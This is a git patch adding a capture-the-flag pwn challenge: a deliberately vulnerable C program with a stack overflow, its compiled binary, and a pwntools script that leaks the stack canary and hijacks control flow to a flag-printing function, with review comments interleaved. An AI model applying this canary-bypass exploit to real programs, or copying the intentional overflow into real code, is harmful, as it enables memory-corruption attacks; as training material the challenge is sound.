From 3a0e685f4db2e516575a01afc4b9743d6729bfab Mon Sep 17 00:00:00 2001
From: Jack Ren
Date: Sat, 11 Dec 2021 12:02:32 +0800
Subject: [PATCH] canary/djCTF-1

---
 canary/djCTF-1/answer.py | 24 ++++++++++++++++++++++
 canary/djCTF-1/compile.sh | 2 ++
 canary/djCTF-1/djctf1 | Bin 0 -> 15696 bytes
 canary/djCTF-1/djctf1.c | 41 ++++++++++++++++++++++++++++++++++++++
 4 files changed, 67 insertions(+)
 create mode 100644 canary/djCTF-1/answer.py
 create mode 100755 canary/djCTF-1/compile.sh
 create mode 100755 canary/djCTF-1/djctf1
 create mode 100644 canary/djCTF-1/djctf1.c

diff --git a/canary/djCTF-1/answer.py b/canary/djCTF-1/answer.py
new file mode 100644
index 0000000..ce50c93
--- /dev/null
+++ b/canary/djCTF-1/answer.py
@@ -0,0 +1,24 @@
+#!/usr/bin/env python2
+from pwn import *
+from LibcSearcher import *
+from struct import pack
+import os, base64, time
+context(arch = "amd64",os = "linux", log_level = "debug")
+
+p = process('./djctf1')
+elf = ELF('./djctf1')
+#gdb.attach(p, "b pwnable\n b flag")
+
+# Canary Leak
+p.recvuntil("> ")
+p.sendline('0' * 0x18)
+p.recvuntil('0' * 0x18)
+canary_value = u64(p.recv(8)) - 0x0a
+print("Canary: " + hex(canary_value))
+
+# hijack control flow
+p.recvuntil("> ")
+#p.sendline('0' * 0x18 + p64(canary_value) + p64(0) + '\x00')
+p.sendline('0' * 0x18 + p64(canary_value) + p64(0))
+#time.sleep(10)
+p.interactive()
diff --git a/canary/djCTF-1/compile.sh b/canary/djCTF-1/compile.sh
new file mode 100755
index 0000000..67f6bd4
--- /dev/null
+++ b/canary/djCTF-1/compile.sh
@@ -0,0 +1,2 @@
+#!/bin/sh
+gcc djctf1.c -g -o djctf1
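Review bot: Three of the five import lines in answer.py are unused — `from LibcSearcher import *`, `from struct import pack` and `import os, base64, time` (only `time` is referenced, and only from the commented-out `time.sleep(10)`), so `from pwn import *` alone would leave the script depending on a single package. The two star-imports also hide which module supplies `u64`, `p64`, `process` and `ELF`. The commented-out `gdb.attach` and the alternate `sendline` line are leftover debugging; either remove them or add a one-line comment saying why the `+ '\x00'` variant was abandoned, e.g. `# kept for reference: the trailing NUL variant did not work — see commit message`.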
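Review bot: `gcc djctf1.c -g -o djctf1` in compile.sh leaves stack-protector behaviour to the toolchain default, yet the exercise is about the canary, so the build only reproduces the committed `djctf1` binary on distributions whose gcc enables the protector by default. Passing it explicitly, `gcc djctf1.c -g -fstack-protector -o djctf1`, pins that and makes the intent of the build visible to whoever recompiles the challenge.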
diff --git a/canary/djCTF-1/djctf1 b/canary/djCTF-1/djctf1 new file mode 100755 index 0000000000000000000000000000000000000000..c9e53a20f03707d34bef1aef2b7fa8c76fe61bde GIT binary patch literal 15696 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 Cc82x< literal 0 HcmV?d00001 diff --git a/canary/djCTF-1/djctf1.c b/canary/djCTF-1/djctf1.c new file mode 100644 index 0000000..b2ea69b --- /dev/null +++ b/canary/djCTF-1/djctf1.c 
@@ -0,0 +1,41 @@
+#include
+#include
+#include
+void pwnable();
+void init();
+__attribute__((aligned(0x100)))
+void flag(){
+ asm volatile(".byte 0x90");
+ asm volatile(".byte 0x90");
+ asm volatile(".byte 0x90");
+ asm volatile(".byte 0x90");
+ asm volatile(".byte 0x90");
+ asm volatile(".byte 0x90");
+ asm volatile(".byte 0x90");
+ asm volatile(".byte 0x90");
+ asm volatile(".byte 0x90");
+ asm volatile(".byte 0x90");
+ system("cat flag");
+ write(1, "Unbelieveable! You must be an experienced hacker!!\n", 51);
+ write(1, "That's your reward!!", 20);
+}
+int main(){
+ init();
+ write(1, "You are so lucky to have unlimited chance!!! xm!!!\n", 51);
+ while(1){
+ pwnable();
+ }
+}
+void init(){
+ setvbuf(stdout, 0LL, 2, 0LL);
+ setvbuf(stdin, 0LL, 2, 0LL);
+ setvbuf(stderr, 0LL, 2, 0LL);
+}
+void pwnable(){
+ char buf[0x10];
+ write(1, "> ", 2);
+ read(0, buf, 0x29);
+ write(1, "Let's check if you are successful. \n", 36);
+ puts(buf);
+ buf[0x18] = 0x00;
+}
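Review bot: `pwnable()` declares `char buf[0x10]` but `read(0, buf, 0x29)` accepts up to 0x29 bytes and `buf[0x18] = 0x00` stores past the end of the array, and `puts(buf)` prints a buffer that is never NUL-terminated within its own bounds; since these are the challenge's intended defects, the source should say so rather than leave a reader to wonder whether they are accidents, e.g. `/* Intentional for the exercise: read() overruns buf and puts() echoes adjacent stack bytes. */` above `char buf[0x10];`. The three `#include` lines show no header names here, which looks like an extraction artifact rather than something in the commit — confirm the file as checked in names the headers that `system`, `write`/`read` and `puts`/`setvbuf` need. `setvbuf(..., 0LL, 2, 0LL)` uses the literal `2` where the `_IONBF` macro would document the intent.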